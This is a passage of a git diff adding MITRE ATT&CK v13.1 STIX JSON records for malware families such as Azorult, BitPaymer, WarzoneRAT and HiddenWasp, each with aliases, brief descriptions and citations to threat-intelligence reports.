b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--440f3f8b-289b-460e-977d-c1c8063c7706", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Comnie" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0244", + "external_id": "S0244" + }, + { + "source_name": "Comnie", + "description": "(Citation: Palo Alto Comnie)" + }, + { + "source_name": "Palo Alto Comnie", + "description": "Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/" + } + ], + "modified": "2020-03-30T15:25:11.871Z", + "name": "Comnie", + "description": "[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f99f3dcc-683f-4936-8791-075ac5e58f10.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f99f3dcc-683f-4936-8791-075ac5e58f10.json new file mode 100644 index 0000000000000000000000000000000000000000..35982a950845f9cfc8f3095f1c4fe8a57537efed --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f99f3dcc-683f-4936-8791-075ac5e58f10.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--1b67f73c-50dc-47b8-b7bd-c50f5cbbd212", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:51:42.922Z", + "name": "LoudMiner", + "description": "[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)", + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "LoudMiner" + ], + "type": "malware", + "id": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10", + "created": "2020-05-18T21:01:51.045Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0451", + "external_id": "S0451" + }, + { + "source_name": "ESET LoudMiner June 2019", + "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.", + "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080.json new file mode 100644 index 0000000000000000000000000000000000000000..6951b292aab0e8c236273d136072a8bd4ff44061 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--3a7fff35-08aa-40df-bd84-16707cbd7c94", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T17:42:52.174Z", + "name": "Azorult", + "description": "[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.\nIn July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Azorult" + ], + "type": "malware", + "id": "malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080", + "created": "2019-01-30T15:19:14.309Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0344", + "external_id": "S0344" + }, + { + "source_name": "Azorult", + "description": "(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)" + }, + { + "source_name": "Proofpoint Azorult July 2018", + "description": "Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + }, + { + "source_name": "Unit42 Azorult Nov 2018", + "description": "Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fa766a65-5136-4ff3-8429-36d08eaa0100.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fa766a65-5136-4ff3-8429-36d08eaa0100.json new file mode 100644 index 0000000000000000000000000000000000000000..75487da3fa6aa2fc3068957cbb6554ec80ee096c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fa766a65-5136-4ff3-8429-36d08eaa0100.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--731c2ce8-f27f-4f99-83be-afa3f57378ab", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "BitPaymer", + "wp_encrypt", + "FriedEx" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fa766a65-5136-4ff3-8429-36d08eaa0100", + "type": "malware", + "created": "2021-02-08T22:19:19.340Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0570", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0570" + }, + { + "source_name": "BitPaymer", + "description": "(Citation: Crowdstrike Indrik November 2018)" + }, + { + "source_name": "wp_encrypt", + "description": "(Citation: Crowdstrike Indrik November 2018)" + }, + { + "source_name": "FriedEx", + "description": "(Citation: Crowdstrike Indrik November 2018)" + }, + { + "source_name": "Crowdstrike Indrik November 2018", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", + "description": "Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021." + } + ], + "modified": "2021-04-26T22:04:32.509Z", + "name": "BitPaymer", + "description": "[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb261c56-b80e-43a9-8351-c84081e7213d.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb261c56-b80e-43a9-8351-c84081e7213d.json new file mode 100644 index 0000000000000000000000000000000000000000..2791d9bccdf2ca4c81b3339f3efd72ca2dd5bfec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb261c56-b80e-43a9-8351-c84081e7213d.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--e887f30c-05b3-4cc6-8d48-35e8a81c6b83", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "BACKSPACE", + "Lecna" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fb261c56-b80e-43a9-8351-c84081e7213d", + "type": "malware", + "created": "2017-05-31T21:32:24.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0031", + "external_id": "S0031" + }, + { + "source_name": "FireEye APT30", + "description": "FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.", + "url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + } + ], + "modified": "2020-03-30T14:54:21.256Z", + "name": "BACKSPACE", + "description": "[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445.json new file mode 100644 index 0000000000000000000000000000000000000000..5db1e4dedb9f2f4c0ab46588736c9b1a6dc69d2e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--19bbb009-37df-4e01-b674-ebcf908098b4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T22:03:44.670Z", + "name": "Zox", + "description": "[Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Zox", + "Gresim", + "ZoxRPC", + "ZoxPNG" + ], + "type": "malware", + "id": "malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445", + "created": "2022-01-09T22:02:05.615Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0672", + "external_id": "S0672" + }, + { + "source_name": "Gresim", + "description": "(Citation: Novetta-Axiom)" + }, + { + "source_name": "ZoxRPC", + "description": "(Citation: Novetta-Axiom)" + }, + { + "source_name": "ZoxPNG", + "description": "(Citation: Novetta-Axiom)" + }, + { + "source_name": "Novetta-Axiom", + "description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.", + "url": "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa.json new file mode 100644 index 0000000000000000000000000000000000000000..645365b7c5e15a2a5d44cf80f34d5edb65b73373 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--28d4ef8f-7de1-4df2-a559-4a238e3e6ff5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "UPPERCUT", + "ANEL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0275", + "external_id": "S0275" + }, + { + "source_name": "UPPERCUT", + "description": "(Citation: FireEye APT10 Sept 2018)" + }, + { + "source_name": "ANEL", + "description": "(Citation: FireEye APT10 Sept 2018)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.", + "source_name": "FireEye APT10 Sept 2018" + } + ], + "modified": "2020-03-30T18:24:27.229Z", + "name": "UPPERCUT", + "description": "[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb575479-14ef-41e9-bfab-0b7cf10bec73.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb575479-14ef-41e9-bfab-0b7cf10bec73.json new file mode 100644 index 0000000000000000000000000000000000000000..8f33f21ee3063076919ffdd02f54f8b69fc48c8c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb575479-14ef-41e9-bfab-0b7cf10bec73.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--48b37529-03cb-4afe-a9f2-21fe27e78b27", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "ADVSTORESHELL", + "AZZY", + "EVILTOSS", + "NETUI", + "Sedreco" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73", + "type": "malware", + "created": "2017-05-31T21:32:34.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0045", + "external_id": "S0045" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "source_name": "ESET Sednit Part 2" + } + ], + "modified": "2020-03-30T01:44:19.899Z", + "name": "ADVSTORESHELL", + "description": "[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0.json new file mode 100644 index 0000000000000000000000000000000000000000..5969036ac03a34e4f6fccfa7c25e76a249da01ad --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--7783e956-4ee4-4a68-8b40-01daee1f9412", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-11T18:34:04.838Z", + "name": "StrifeWater", + "description": "[StrifeWater](https://attack.mitre.org/software/S1034) is a remote-access tool that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) in the initial stages of their attacks since at least November 2021.(Citation: Cybereason StrifeWater Feb 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "StrifeWater" + ], + "type": "malware", + "id": "malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0", + "created": "2022-08-15T16:31:56.856Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1034", + "external_id": "S1034" + }, + { + "source_name": "Cybereason StrifeWater Feb 2022", + "description": "Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.", + "url": "https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3.json new file mode 100644 index 0000000000000000000000000000000000000000..b63594da01489c0e8fb4634071e711da83232e66 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--1eea7d97-8ad3-4cea-8f24-1eb6d0deb494", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Mivast" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3", + "created": "2017-05-31T21:32:54.044Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0080", + "url": "https://attack.mitre.org/software/S0080" + }, + { + "source_name": "Mivast", + "description": "(Citation: Symantec Black Vine) (Citation: Symantec Backdoor.Mivast)" + }, + { + "source_name": "Symantec Black Vine", + "url": "https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf", + "description": "DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016." + }, + { + "source_name": "Symantec Backdoor.Mivast", + "url": "http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2", + "description": "Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)", + "modified": "2022-07-20T20:09:46.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mivast", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fc774af4-533b-4724-96d2-ac1026316794.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fc774af4-533b-4724-96d2-ac1026316794.json new file mode 100644 index 0000000000000000000000000000000000000000..5c8be9d762339063b12b5e7d8610306870b23a78 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fc774af4-533b-4724-96d2-ac1026316794.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--120712fe-410b-419a-8d41-4e6788de3b27", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HiddenWasp" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fc774af4-533b-4724-96d2-ac1026316794", + "type": "malware", + "created": "2019-06-24T12:04:32.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0394", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0394" + }, + { + "source_name": "HiddenWasp", + "description": "(Citation: Intezer HiddenWasp Map 2019)" + }, + { + "description": "Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.", + "url": "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/", + "source_name": "Intezer HiddenWasp Map 2019" + } + ], + "modified": "2021-04-23T20:07:01.487Z", + "name": "HiddenWasp", + "description": "[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde19a18-e502-467f-be14-58c71b4e7f4b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde19a18-e502-467f-be14-58c71b4e7f4b.json new file mode 100644 index 0000000000000000000000000000000000000000..877abe40265fc2fa3d1b9987581f0d95a79c1301 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde19a18-e502-467f-be14-58c71b4e7f4b.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--7fbd040e-1c61-4fc5-b857-16d2f89c4bf2", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Abhijit Mohanta, @abhijit_mohanta, Uptycs", + "Shilpesh Trivedi, Uptycs" + ], + "x_mitre_aliases": [ + "WarzoneRAT", + "Warzone", + "Ave Maria" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--fde19a18-e502-467f-be14-58c71b4e7f4b", + "created": "2021-12-27T17:21:18.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0670", + "url": "https://attack.mitre.org/software/S0670" + }, + { + "source_name": "Ave Maria", + "description": "(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)" + }, + { + "source_name": "Check Point Warzone Feb 2020", + "url": "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", + "description": "Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021." + }, + { + "source_name": "Uptycs Warzone UAC Bypass November 2020", + "url": "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "description": "Mohanta, A. (2020, November 25). Warzone RAT comes with UAC bypass technique. Retrieved April 7, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[WarzoneRAT](https://attack.mitre.org/software/S0670) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)", + "modified": "2022-04-15T14:24:50.745Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "WarzoneRAT", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde50aaa-f5de-4cb8-989a-babb57d6a704.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde50aaa-f5de-4cb8-989a-babb57d6a704.json new file mode 100644 index 0000000000000000000000000000000000000000..6e392ad434b1745e6cb7688007202552d371923d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde50aaa-f5de-4cb8-989a-babb57d6a704.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--87257367-603b-4d67-9ccc-1de600c3c783", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Net Crawler", + "NetC" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--fde50aaa-f5de-4cb8-989a-babb57d6a704", + "created": "2017-05-31T21:32:38.851Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0056", + "url": "https://attack.mitre.org/software/S0056" + }, + { + "source_name": "Cylance Cleaver", + "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)", + "modified": "2022-07-22T18:37:22.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Net Crawler", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 